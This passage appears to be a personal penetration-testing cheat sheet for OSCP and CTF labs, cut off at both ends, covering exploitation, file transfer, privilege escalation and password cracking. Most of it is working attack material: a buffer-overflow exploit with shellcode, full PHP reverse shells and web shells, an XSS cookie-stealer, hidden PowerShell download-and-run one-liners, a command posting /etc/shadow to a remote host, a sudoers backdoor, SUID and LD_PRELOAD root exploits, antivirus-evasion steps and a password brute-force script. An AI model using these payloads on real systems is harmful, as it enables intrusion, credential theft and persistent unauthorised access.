    b"\x11\xea\xc8\x78\x2d\xec\xb2\x25\x8b\x67\x5e\x31\xa6\x2a\x37"
    b"\xf6\x8b\xd4\xc7\x90\x9c\xa7\xf5\x3f\x37\x2f\xb6\xc8\x91\xa8"
    b"\xb9\xe2\x66\x26\x44\x0d\x97\x6f\x83\x59\xc7\x07\x22\xe2\x8c"
    b"\xd7\xcb\x37\x02\x87\x63\xe8\xe3\x77\xc4\x58\x8c\x9d\xcb\x87"
    b"\xac\x9e\x01\xa0\x47\x65\xc2\xc5\x97\x67\x14\xb2\x95\x67\x09"
    b"\x1e\x13\x81\x43\x8e\x75\x1a\xfc\x37\xdc\xd0\x9d\xb8\xca\x9d"
    b"\x9e\x33\xf9\x62\x50\xb4\x74\x70\x05\x34\xc3\x2a\x80\x4b\xf9"
    b"\x42\x4e\xd9\x66\x92\x19\xc2\x30\xc5\x4e\x34\x49\x83\x62\x6f"
    b"\xe3\xb1\x7e\xe9\xcc\x71\xa5\xca\xd3\x78\x28\x76\xf0\x6a\xf4"
    b"\x77\xbc\xde\xa8\x21\x6a\x88\x0e\x98\xdc\x62\xd9\x77\xb7\xe2"
    b"\x9c\xbb\x08\x74\xa1\x91\xfe\x98\x10\x4c\x47\xa7\x9d\x18\x4f"
    b"\xd0\xc3\xb8\xb0\x0b\x40\xd8\x52\x99\xbd\x71\xcb\x48\x7c\x1c"
    b"\xec\xa7\x43\x19\x6f\x4d\x3c\xde\x6f\x24\x39\x9a\x37\xd5\x33"
    b"\xb3\xdd\xd9\xe0\xb4\xf7")

shellcode = b("A" * 2003) + b"\xaf\x11\x50\x62" + b"\x90" * 32 + exploit

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((vulnserverHost, vulnserverDefaultPort))
    s.send('TRUN /.:/' + shellcode)
except:
    print("check debugger")
finally:
    s.close()

Add \x90*32 (for no operation = NOP) as padding so return won't interfer with the exploit code. The CPU will just forward over NOP in the Stack until it finds the next suitable instruction

Execute

Setup a Netcat listening port.

nc -nvlp 4444

then run the exploit and trigger the reverse shell

whoami can find out well who is connected

Compiling an Exploit

google the exploit Samba 2.2.2a (was the result of first attack vector with metasploit) https://www.exploit-db.com/exploits/10 Download the exploit

gcc 10.c -o trans2open
./trans2open -b 0 10.0.2.5

Should give you root access

Generate basic payload

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe

List of Payloads to generate

https://netsec.ws/?p=331

Bruteforce attacks

Hydra for SSH

Sample to attack Kioptrix

locate wordlists

hydra -v -l root -P /usr/share/wordlists/rockyou.txt <ip> ssh

-v - verbose mode
-P - Passwordlist

Crack ssh with john

/usr/share/john/ssh2john.py <priv_key_with_pw> > privKey_1
john --wordlist=/usr/share/wordlists/rockyou.txt privKey_1

Decrypt RSA

Script https://github.com/GammaG/DecryptRSA/blob/master/decryptRSA.py

In Python Terminal transfer the result to hex cut of hex declarations and decode the hex

pt= <pt>
str(hex(pt)[2:-1]).decode('hex')

XSS and MySQL FILE

https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ Only ISO for 64 bit Debian 64 and Live image

XSS

<script>alert('xss')</script>
" onmouseover="alert(document.cookie)

create index.php and put it in the home directory of the user you will run it with

<?php
    $cookie = isset($_GET["test"])?$_GET['test']:"";
?>

install it in a apache server run php

service apache2 stop
php -S 10.0.2.6:80

in the vulnerable field enter

<script>location.href='http://10.0.2.6/index.php?test='+document.cookie;</script>

SQL injection

https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

SQLMap

Look for anything that looks like it trigger a sql query. Admin page requests posts with "id=1" in the URI. That is a good indicator that sql injection is possible here.

For testing

sqlmap -u "http://10.0.2.7/admin/edit.php?id=1" --cookie=PHPSESSID=<id>

For dumping

sqlmap -u "http://10.0.2.7/admin/edit.php?id=1" --cookie=PHPSESSID=<id> --dump

For getting a shell

sqlmap -u "http://10.0.2.7/admin/edit.php?id=1" --cookie=PHPSESSID=<id> --os-shell

Parameter

sqlmap -u "http://status.catch.htb:8000/api/v1/components?name=1&1[0]=&1[1]=a&1[2]=&1[3]=or+%27a%27=%3F%20and%201=1)*+--+" --dbms=mysql -D cachet -T users -C api_key,username --dump

Local File Inclusion (LFI)

https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

Nikto

nikto -h 10.0.2.8

Directory Traversal

../../../../../../../../../../etc/passwd

doesn't work Adding a null byte does the trick until php 5.3

../../../../../../../../../../etc/passwd%00

Inject a file -> Submit allows to upload a pdf. Create a file that has a pdf header but contains php otherwise.

shell.pdf

%PDF-1.4

<?php
    system($_GET["cmd"]);
?>

that goes to upload page and can trigger a command

http://10.0.2.8/index.php?page=uploads/shell.pdf%00&cmd=whoami

Shellcode to create a reverse shell

https://github.com/GammaG/php-reverse-shell

/usr/share/webshells/php/simple-backdoor.php

Get the php file and change the ip and port where the shell should connect to.

nc -nvlp 4444

In Browser:

http://10.0.2.8/index.php?page=uploads/reverseshell.pdf%00

php reverse shell

/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

php reverse shell from pentest monkey

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = 'REPLACE_WITH_YOUR_IP';
$port = 5555;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

Privilage Escalation

find a folder with full rights -> tmp

Remote File Inclusion (RFI)

Host a file yourself and let the victim download it

Damn Vulnerable Web Application (DVWA)

http://www.dvwa.co.uk/

Generate Reverse shell msfvenom

msfvenom -p php/meterpreter/revese_tcp LHOST=<host ip> LPORT=4444 >> exploit.php

host the file with python server

service apache2 stop
python -m SimpleHTTPServer 80

In Python3

No module named SimpleHTTPServer error is ModuleNotFoundError in Python.

If you are using Python3 and try to start the SimpleHTTPServer, you will get the error like No module named SimpleHTTPServer.

It is because it is merged with http.server module. You can use the below command to run the python http server in Python 3.

python -m http.server 80

python give you debug information

Setup meterpreter

alternative to nc - only once allowed in OSCP better use nc

sudo msfconsole -q -x "use exploit/multi/handler;\
set payload php/meterpreter/reverse_tcp;\ 
set LHOST 192.168.134.129;\
set LPORT 4444 ;\
run"

-q - start quietly
-x - passing payload settings

on DVWA the page is called via parameter "?page=" enter here the malicious page as goal

dvwa.com/vulnerabilites/fi/?page=http://10.0.2.6/exploit.php

File Transfer

Put with nmap

nmap -p 80 10.0.2.11 --script http-put --script-args http-put.url='<target path>',http-put.file='<local path>'

Get with SCP

scp <user>@<ip>:<filename> <target>

ftp hosting with python

apt-get install python-pyftpdlib
go to the folder you want to use
python -m pyftpdlib -p 21
p for port

PHP Reverse shell upload

<?php 
    if (isset($_REQUEST['fupload'])) {
        file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.7:7777/" . $_REQUEST['fupload']));
    };  

    if (isset($_REQUEST['fexec'])) {
        echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
    };
?>

Upload and execute the payload download nc64.exe and upload via fupload and execute a reverse shell via nc64.exe

<url>?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e cmd 10.10.14.7 5555"

get files over windows shell - windows download

ftp <ip>
binary - so the files are having the correct chars

script it

echo open <ip> ftp.txt
echo anonymous >> ftp.txt
echo pass >> ftp.txt
echo get exploit.php >> ftp.txt
echo bye >> gtp.txt

ftp -s:ftp.txt

There should not be spaces in there

host with msfconsole

use auxiliary/server/ftp
exploit

For old windows machines

TFTP

On Linux
atftpd --daemon --port 69 /var/www/html

On Windows
tftp -i <ip> get exploit.php

certutil windows download

certutil -urlcache -f <url>/filename.exe filename.exe 

Powershell

echo $storage = $pwd > get.ps1
echo $webclient = New-Object System.Net.Webclient >> get.ps1
echo $url = "http://<ip>/exploit.php" >> get.ps1
echo $file = "exploit.php" >> get.ps1
echo $webclient.DownloadFile($url,$file) >> get.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1

Also works as oneliner 
echo $storage = $pwd&$webclient = New-Object System.Net.Webclient&$url = "http://<ip>/exploit.php"&$file = "exploit.php"&$webclient.DownloadFile($url,$file) >> get.ps1

Powershell One-Liner

powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('<url>',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe")


## Version1
c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('<url>')"


## Version2
c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd <base64 Command>

Privilege Escalation

Guides for privilege Escalation

Basic Pentesting 1 OVA

https://www.vulnhub.com/entry/basic-pentesting-1,216/

Guides

Windows

https://www.fuzzysecurity.com/tutorials/16.html

Windows-PrivEsc-Checklist

https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

Analysis Tools

Executable

Deployment with Visual Studio Required

PowerShell

Other

https://null-byte.wonderhowto.com/how-to/get-root-with-metasploits-local-exploit-suggester-0199463/

Upgrade to Meterpreter

CTRL + Z to background the session and y for yes you can verify with "sessions" upgrade by typing

sessions -u 1

and go back into the session by

sessions -i <id>

Sessions should run in background

use multi/recon/local_exploit_suggester

specify the meterpreter session via set session and run

PowerUp Shell

locate PowerUp.ps1
and cp 

Download with CMD Internet Explorer

echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.7:8000/PowerUp.ps1') | powershell -noprofile -

Linux

show current path

pwd

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Admin Shell upload - Wordpress

Will create a reverse shell with a php shell and cleanup on its own. Need Wordpress admin access.

use exploit/unix/webapp/wp_admin_shell_upload

Find the Kernel version

uname -a -> on the local maschine

PHPShell

<?php echo(system(system($_GET["cmd"])); ?>

Can be used with PHP filter module.

Linuxprivchecker

https://github.com/GammaG/linuxprivchecker

Then put in it apache directory. On the target machine make a file transfer to pull this. This is the python version, but there are alternative versions.

Copy the kernel as first thing and check if there is any exploits available.
Check World Writeable Files (maybe passwd is in there)

End the Channel und go back to Meterpreter

edit /etc/passwd
(works as vi)

Open another terminal to generate the pw hash

openssl passwd --help
openssl passwd -1 (gives you an md5 hash)

Go back to meterpreter

paste the hash instead of the "x" for root
shell 
python -c 'import pty; pty.spawn("/bin/bash")'
su root

Windows Enumeration

Check vulnerable services

List all the running services on the maschine that are automatically started and non standard.

wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows" |findstr /i /v "\""
wmic - gives a list of all running services
/i - makes the search case insensitive
/v ignores anything that contains the given String

Possible finding C:\Program Files... --> can be used by putting a file with name Files.exe under C:\Program

check ports and services

netstat -ano

check dir permissions

icacls "path"

check for local admin

net localgroup administrators

check user permissions

whoami /priv

Generate Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<url> LPORT=<port> -e x86/shikata_ga_nai -i 7 -f raw > shell.bin
-i - means the iterations shikata ga nai will execute on the payload

Inject the payload in a trustworthy exe like whoami.exe with the help of shellter

Generate JSP Payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f raw -o revshell.jsp

-p java/jsp_shell_reverse_tcp
    Specifies the payload type
LHOST=10.10.16.72
    Specifies my Kali IP address to connect back to
LPORT=1337
    Specifies the port my Kali box is listening on
-f raw
    Outputs the payload in a raw .jsp format
-o revshell.jsp
    Name the output file ‘revshell.jsp’

Generate Reverse meterpreter shell

msfvenom --payload windows/x64/meterpreter_reverse_tcp --format exe LHOST=10.10.14.8 LPOST=443 --arch x64 --platform windows --out meterpreter.exe

Catch the shell

msfconsole
use multi/handler
set lhost 10.10.14.8
set lport 443
set payload windows/x64/meterpreter_reverse_tcp
set EXITFUNC thread
run

Msfconsole meterpreter

msfconsole -q -x "use exploit/multi/handler;\
set PAYLOAD windows/meterpreter/reverse_tcp;\
set AutoRunScript post/windows/manage/migrate;\
set LHOST <ip>;\
set LPORT <port>;\
run"

This will start a session handler and wait for incomming reverse shell requests. Then directly automigrate the process to a new process.

Set password for windows account

net user <accountname> <password>

Linux Enumeration

Transfer file via ssh

Push

scp <path_to_file> user@server:/home/user

Get

scp user@server:/home/user/file.tgz /home/user

ARP

Show ARP Communication

old: 
    arp -a
new:
    ip neigh

Search for Passwords in the whole system

grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
locate password | more

Search for Subdomains

Get the list from here https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt

wfuzz -c -f sub-fighter -w top5000.txt -u '<url>' -H "HOST: FUZZ.<url>" --hw 290

--hw 290 to take out 404 pages

Alternative with gobuster

gobuster vhost -u <url> -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt

Exploitation

Linux Post Exploitation

https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List

/bin/netstat -ano - to get open connections, maybe to get access to different networks

Search for flags as well

Android

Decompile with APK Tools makes dex to smali and make the manifest readable .bin -> .xml

apktool d <apk> 

Rebuild APK

Download a non dirty version from https://bitbucket.org/iBotPeaches/apktool/downloads/

java -jar apktool_2.6.1.jar b -r -f <folder>

Decomplie dex to java

d2j-dex2jar -d /path/to/classes.dex

Open jar with jd-gui

Analyse apk further

MobSF Framework allows analyse clone it and install with setup.sh

git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF --depth=1

easier is the docker version

docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

Windows Exploitation

ASP Reverse Shell

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

pwdump7

https://www.tarasco.org/security/pwdump_7/

locate in Kali and transfer these files
fgdump
wce

Port forward Uses plink.exe that is part of putty https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe

apt install ssh
nano /etc/ssh/sshd_config

search the following line search the following line

#PermitRootLogin prohibit-password

change following lines

Port 8888
PermitRootLogin yes
service ssh restart
service ssh start

Use Plink.exe on Windows to reverse connect to Kali

plink.exe -l root -pw toor <Kali_ip> -R 445:127.0.0.1:445 -P 8888
-R Port Forwarding
-P Port on Kali

If the screen doesn't change hit enter until it continues. Check you connection

netstat -ano | grep 8888

Next forward the Administrator access to localhost 445 if it look like it failed just repeat it

psexec.py "./Administrator:<pw>"@127.0.0.1

Unshadow

Try to decrypt passwd and shadow file

unshadow PASSWORD-FILE SHADOW-FILE

remove everything expect the users

Hash Identifier Tool

hash-identifier

Hashcat

Identifiy the Algorithmus used for account creation https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat64.exe -m Algorithm_Type_number cred.txt rockyou.txt -O
for example (1800)

GTFOBins

Show what a user is allowed to execute as sudo without giving a password

sudo -l

Exploit what is possible with that - search for GTFOBins https://gtfobins.github.io/ Use to escalate

wget - Push /etc/shadow to remote location

sudo wget --post-file=/etc/shadow <IP>:<PORT>

Receive the file in NetCat

nc -nvlp <PORT>

LD_PRELOAD

if sudo -l gives you back and you have at least one entry that allows sudo without pw

env_keep+=LD_PRELOAD

create a file - shell.c - with the following content to escalate

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init(){
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

compile it with

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

start it with

sudo LD_PRELOAD=/home/USER/shell.so <something that can be executed as sudo e.g. apache2>

FTP push file

ftp-upload -h {HOST} -u {USERNAME} --password {PASSWORD} -d {SERVER_DIRECTORY} {FILE_TO_UPLOAD}

Capabilities Get a list of programs that are allowed to be executed as root by the current user. Only works if +ep is present.

getcap -r / 2>/dev/null

Result should be something like this:

/usr/bin/python = cap_setuid+ed

Get root with python

python -c 'import os; os.setuid(0); os.system("/bin/bash")'

Create Root Bash

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'
For execution:
/tmp/bash -p

Use tar when wildcard is in use

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > target_path/shell.sh
chmod +x shell.sh
touch /home/andre/backup/--checkpoint=1
touch /home/andre/backup/--checkpoint-action=exec=sh\ shell.sh

When bash shows up

/tmp/bash -p

NFS Mounting

it's based on root squash

cat /etc/exports

only works if something shows here with "no_root_squash"

showmount -e <ip>
mkdir /tmp/mountme
mount -o rw,vers=2 <target_ip>:/<mountable_folder> /tmp/mountme

move over something like shell.c and gcc it + chmod +s it

TTY

If sudo -l shows tty is missing try to get a shell by using this: https://netsec.ws/?p=337

!exchange sh for bash

python -c 'import pty; pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Upgrade TTY further

Enables autocomplete in reverse shell and so on

Close the connection Strg + z

stty raw -echo
fg + enter (twice)

Back in the shell

export TERM=xterm

Monitor Process unprivileged

https://github.com/DominicBreuker/pspy 

SMB

SMBServer

use this for file exchange

smbserver.py shareName sharePath
smbserver.py privesc . 
. for current directory

SMB Analysis

This lists file shares and shows the permissions

smbmap -H <ip>

Connect to smb share to make a null authentication and may see the shares available and will give a prompt when login was successful

smbclient //<ip>/<share>

List all files in dir with permissions

smbmap -R <directory> -H <ip>
OR
smbclient '\\server\share'
find . -type f
OR
recurse ON
ls

with a known user

smbmap -d <domain> -u <user> -p <password> -H <ip>

Get files from SMB by filename

smbmap -R <directory> -H <ip> -A <fileToDownload> -q
OR
smbclient '\\server\share'
recurse ON
prompt OFF
mget * (or the specific file) - will store it to ~

Decrypt Grouppolicy password

gpp-decrypt <pw>

Exploitation

Metasploit

msfconsole
search <term>
use <path>
show options
show targets
set target <id>
exploit

Get impacket https://github.com/GammaG/impacket and intall via

python3 -m pip install .

List all users

GetADUsers.py -all <DomainName>/<User> -dc-ip <TargetIP> 

Try if you are admin

psexec.py <DomainName>/<User>@<ip>

AD Exploitation

Switch to Windows

Open an session in the domain controller

runas /netonly /user:<domain\User> cmd
confirm by
dir \\<ip>\<directory> e.g. dir \\10.10.10.100\users

Test LDAP

Test-NetConnection -Computername <ip> -Port 389

Bloodhound

In Kali setup the following in order to download the scripts. For analysis of Windows Maschines. Clone the Collectors folder from https://github.com/GammaG/BloodHound and move the following to windows.

BloodHound/Collectors/ShareHound.exe

And install Bloodhound in Kali via apt

In Windows set the DNS Server to the domain. Call in the window with the active domain controller session

.\SharpHound.exe -c all -d <domain> --domaincontroller <ip>

This creates a .zip file move this back to Kali Setup Neo4j if not yet done.

bloodhound

In the form drop the zip file. After processing use the search

<user>@<domain>

Common queries

  • Find Shortest Paths to Domain Admins
  • Shortest Paths from Kerberoastable Users

If a user a Kerberoastable (Impacket Tool)

GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>

If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it because of your local time, you need to synchronise the host with the DC: ntpdate

With the has use Hashcat for cracking. https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat -m <mode> cred.txt /usr/share/wordlists/rockyou.txt -O

login into the new account

psexec.py <domain>/<user>@host

*Powershell Download *

Invoke-WebRequest $url -OutFile $path_to_file

Windows PW Cracking

Crack Password Hash

john --wordlist=/root/rockyou.txt <dumpfile>
john --show <dumpfile>

Online Hashcracker

Needs NTLM cracking for windows passwords.

https://hashkiller.io/listmanager https://hashes.com/decrypt/basic https://crackstation.net/

Export User Passwords

reg SAVE HKLM\SAM C:\SAM
reg SAVE HKLM\SYSTEM C:\SYSTEM

Linux PW Cracking

Unshadow

unshadow passwd shadow > unshadow.txt

Cracking with John

john --rules --wordlist=/root/rockyou.txt unshadow
(will take forever)

Alternative:

hashcat -m 500 /root/rockyou.txt unshadow

Good to export that to a different machine with a strong GPU (Tower)

https://hashcat.net/hashcat/ https://resources.infosecinstitute.com/hashcat-tutorial-beginners/

Crack zip password

fcrackzip -D -p /usr/share/wordlists/rockyou.txt file.zip

File Analysis

save as unknown
file unknown

Pivoting

Tunneling into a different network via another machine.

Setup a lab

Go in virtual network editor

Kali
    One Host-Only network with:
    Subnet IP   10.1.10.0
    Mask        255.255.255.255

Windows in the middle    

Victim
    One Nat Network with:
    Subnet IP   192.168.134.0
    Mask        255.255.255.0

Metasploit

run autoroute -s 192.168.134.0/24
run autoroute -p 

CTF Notes

Reverse Shells

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 

PHP Base64 encoding to get content

https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb

php://filter/convert.base64-encode/resource=index.php

Generator

https://www.revshells.com/ https://github.com/evildevill/revshells

Build and run local Version with docker

docker build -t reverse_shell_generator .
docker run -d -p 80:80 reverse_shell_generator

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md 

Docker

https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it bash chroot /mnt sh

bash maybe has to be changed into what is running

SUID

Get files that have the SUID Bit set

First one is more clean

find / -perm -u=s -type f 2>/dev/null

find / -type f -perm -04000 -ls 2>/dev/null

good entry point is systemctl

https://gtfobins.github.io/

Search for systemcrl - SUID paste the lines each single

env - is a good point here 

Escalate SUID Manually

install strace for analysing what is called by an application

strace patchToApplication 2>&1 | grep -i -E "open|access|no such file"

Search for something that you as user have writing permissions

Replace it with C script

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Escalate with SUID Bit./

Dash doesn't lose the SUID Bit

cp /bin/dash /tmp/ippsec3; chmod +s /tmp/ippsec3; /bin/dash;
6 is for users and group 

Compile with

gcc -shared -fPIC -o /pathToDeployTo /PathOfTheSourceFile

Escalate with PATH manipulation

Create an alternative "service" file to execute. This will only with in combination with SUID.

echo 'int main() { setgit(0); setuid(0); system("bin/bash"); return 0;}' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH

Reverse Shell one liner

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Make files downloadable

sudo service apache2 start
cp file /var/www/html
id - gives you current rights 

Priviledge Check

https://github.com/GammaG/linuxprivchecker

Create Reverse Shell

https://netsec.ws/?p=331

Set up Meterpreter session

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit

Generate the payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 EXITFUNC=thread -f raw > shell.php

https://github.com/pentestmonkey/php-reverse-shell

Meterpreter Session

msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

shell - to get normal shell

Get file version (Depackage)

dpkg -l | grep <file>

Read exploits from searchsploit

/usr/share/exploitdb/exploits/linux/local/...

add local user to sudoers

echo 'chmod 777 /etc/sudoers && echo "<user> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod 777 on the file

push cron jobs

run-parts /etc/cron.daily

Call URL via console

curl <url>

Show open ports in kali

sudo netstat -tulpn

Malicious Plugin

sudo apt install seclists

Wordpress exploitation

Once seclists are installed it can be found in /usr/share/seclists and the plugin can be found under Web-Shells/WordPress. The malicious plugin is called "plugin-shell.php"

Connect to MySQL DB in Kali

mysql --host=<ip> --port=<port> --user= <user> -p 
ip - would be 127.0.0.1 in case of port forwarding
port - the port where the portforward is running at

RDP

xfreerdp is preinstalled

xfreerdp /d:<domain> /u:<user> /v:<target_ip> +clipboard

Crack PGP/GPG private key

https://www.openwall.com/lists/john-users/2015/11/17/1

gpg2john target/tryhackme.asc > target/hash
john --wordlist=modules/rockyou.txt output

gpg --allow-secret-key-import --import tryhackme.asc
gpg --delete-secret-keys "tryhackme"

Writing space

Space can be written as

${IFS}

so ls -la would be

ls${IFS}-la

Execute Bash/Sh script

alternative to

 ./<script> 

you can also write

bash <script>

Execute Exe

.\NAME.exe

Additional

Good for notes is Cherrytree. https://www.giuspen.com/cherrytree/#downl

https://www.reddit.com/r/oscp/

Mount shared Folder virutalbox

mkdir share

#!/bin/bash
sudo mount -t vboxsf <folder-host> ~/share/

SSH

Use custom key file for ssh

ssh root@ip -i privKey.pem

JWT Decode

JWTs can be decoded using https://jwt.io/. This tool allows to craft and decode JWTs. Also to modify an original JWT to generate a new one using the same secret (so long as the secret is known).
Crack the secret using jwtcrack.

    ./jwtcrack <JWT>

Brute Force CSRF Token

Python Script to brute force a password based on the rockyou wordlist entering every time a new csrf token that is extracted from the page.

import requests
import re
import threading
from queue import Queue

# Parameters provided
url = 'http://adress/login'
wordlist_path = '/usr/share/wordlists/rockyou.txt'
username = 'admin'  # Username set to 'admin'

# Function to extract CSRF token
def extract_csrf_token(content):
    # Adjusted regex pattern to account for possible whitespaces
    match = re.search(r'name\s*=\s*"login-(\d+\.\d+)"', content)
    if match:
        return match.group(1)
    else:
        print("CSRF token not found.")
        return None

# Function to attempt login with a password and CSRF token
def attempt_login(password, csrf_token):
    # Replace $1 with the password and $2 with the CSRF token
    data = f"username={username}&password={password}&login-{csrf_token}="
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        response = requests.post(url, data=data, headers=headers)
        # Print the status code and the size of the response
        print(f"Password: {password} | Status Code: {response.status_code} | Response Size: {len(response.content)}")
        return response
    except Exception as e:
        print(f"An error occurred during login attempt: {e}")
        return None

# Worker function for the threads
def worker(queue):
    while not queue.empty():
        password = queue.get()
        try:
            # Get a new CSRF token for each attempt
            response = requests.get(url)
            csrf_token = extract_csrf_token(response.text)
            if csrf_token:
                login_response = attempt_login(password, csrf_token)
            else:
                print("Failed to retrieve CSRF token.")
        except Exception as e:
            print(f"An error occurred: {e}")
        finally:
            queue.task_done()

# Load the wordlist
with open(wordlist_path, 'r', errors='ignore') as file:
